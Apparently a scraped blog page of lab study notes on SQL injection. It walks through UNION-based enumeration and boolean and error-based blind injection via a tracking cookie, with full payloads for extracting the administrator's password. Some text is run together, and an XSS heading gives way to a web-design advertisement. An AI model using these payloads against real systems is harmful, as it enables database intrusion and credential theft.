☰
WEB PENETRATION TESTING-- Admin + is + trator
2026/10/7 21:26:38 网站建设 项目流程

SQLi

Ctrl+u : encode
’ 1=1–
PS:
After the ’ have a SPACE
But before “–”,have no SPACE

UNION-based SQL Injection

(1) Determine the number of columns

order by1✅正常 order by2✅正常 order by3❌报错 OR UNION SELECT NULL ❌报错 UNION SELECT NULL,NULL ✅正常 UNION SELECT NULL,NULL,NULL ❌报错

(2) Determine the data types of the columns (must from a table),just know if it’s str

# Oracle must have the "FROM",so it's easy to use "FROM dual"UNION SELECT NULL,NULL FROM DUAL UNION SELECT'a',NULL FROM DUAL UNION SELECT NULL,'a'FROM DUAL UNION SELECT'a','a'FROM DUAL#if NULL,'a', you could:selectNULL,username||'~'||password fromusers

(3) Output the version of the database

数据库版本查询语句
OracleSELECT banner FROM v$version
OracleSELECT version FROM v$instance
MicrosoftSELECT @@version
PostgreSQLSELECT version()
MySQLSELECT @@version
# Must match the number of columnUNION SELECT banner, NULL fromv$version--# v$version store version info

(4) Output TABLE NAME
USER_STATS

数据库查询所有表查询指定表的列
OracleSELECT * FROM all_tablesSELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
MicrosoftSELECT * FROM information_schema.tablesSELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQLSELECT * FROM information_schema.tablesSELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
MySQLSELECT * FROM information_schema.tablesSELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

Google:information_schema.tables postgresql to find the “table_name”

SELECT*FROMinformation_schema.tablesUNIONSELECTtable_name,NULLFROMinformation_schema.tables

Search to find the table: “users_vzoxvb”

(5) Output COLUMN NAME in table
Google:information_schema.columns postgresql to find “column_name” field
Search “Table_name” in Response,and use table_name replace the *

SELECT*FROMinformation_schema.columnsWHEREtable_name='TABLE-NAME-HERE'UNIONSELECTcolumns,NULLFROMinformation_schema.columnsWHEREtable_name='table_name' #Typethe users_vzoxvb intotable_namefieldUNIONSELECTcolumn_name,NULLFROMinformation_schema.columnsWHEREtable_name='users_vzoxvb'

to Get “username_ggtjng” “password_ccixiu”

SELECT COLUMN_NAME FROM all_tab_columns WHERE table_name = ‘USERS_DTFKLB’

(6) Output Username and PWD

UNIONselectusername_ggtjng,password_ccixiu from users_vzoxvb

to Rearch “Admin” or Normal User

Blind SQL Injection Response

Don’t like Union injection that show some data,blind always response “200”.
Time-based Blind SQLi could generate cmd which meet specific conditions to dalay the database.
(1)Confirm SQLi vulnerable

# use the trackingIdselecttracking-idfromtracking-tablewheretrackingId='RvLfBu6s9EZRlVYN'Cookie: TrackingId=jxuJ6305dQ35cEPz' and 1=1-- -> Welcome Cookie: TrackingId=jxuJ6305dQ35cEPz'and1=0-- -> No Welcome

(2) Confirm that we have a users table

# If users table is exist,will output 'TestIfExist'SELECT'TestIfExist'FROMusers;# So we could test if the users is existingCookie: TrackingId=jxuJ6305dQ35cEPz' and (select 'x' from users LIMIT 1)='x'-- # Confitm the user name is "administrator" (SELECT 'a' FROM users WHERE username='administrator')='a' Cookie: TrackingId=jxuJ6305dQ35cEPz'and(SELECT'a'FROMusersWHEREusername='administrator')='a'--;

(3)Determine PWD
Determine the length of PWD,Just use the Intruder

Cookie:TrackingId=jxuJ6305dQ35cEPz' and (SELECT 'a' FROM users WHERE username='administrator'AND LENGTH(password)>=20)='a'--;

Then foreach the char

Cookie:TrackingId=jxuJ6305dQ35cEPz' and (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='e'--


Blind SQL Injection Error

  1. Prove that parameter is vulnerable
||is to connect str,must use the''instead of""Cookie:TrackingId=hzd4cBI1UR0iMgKf'||(select '' from dual)||'
  1. Confirm users table and administrator
# Determine the tableCookie: TrackingId=giUpOQnNBkR52ME7'||(select '' from users where rownum=1)||'# rowmun=1 is only to retrieve one line# Determine the adminitratorCookie: TrackingId=giUpOQnNBkR52ME7'||(select '' from users where username='adminitrator')||'

(3)Determine the PWD
Cuz we can’t see the page that have right CMD,so we let the right CMD behavior ERROR,so we can judge the right CMD

# If 语句 is right ,we could find the ERROR to judge it is correct.'||(SELECT CASE WHEN (语句) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'# The Real Condition:# Determine Length : SELECT CASE WHEN (LENGTH(password)<10)Cookie: TrackingId=giUpOQnNBkR52ME7'||(SELECT CASE WHEN (LENGTH(password)>10) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'# Determine Char : Notify adminitrator and "AND" inside the "(..... AND substr(password,1,1)='a')"'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator' AND substr(password,1,1)='a')||'

XSS(跨站脚本攻击)

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询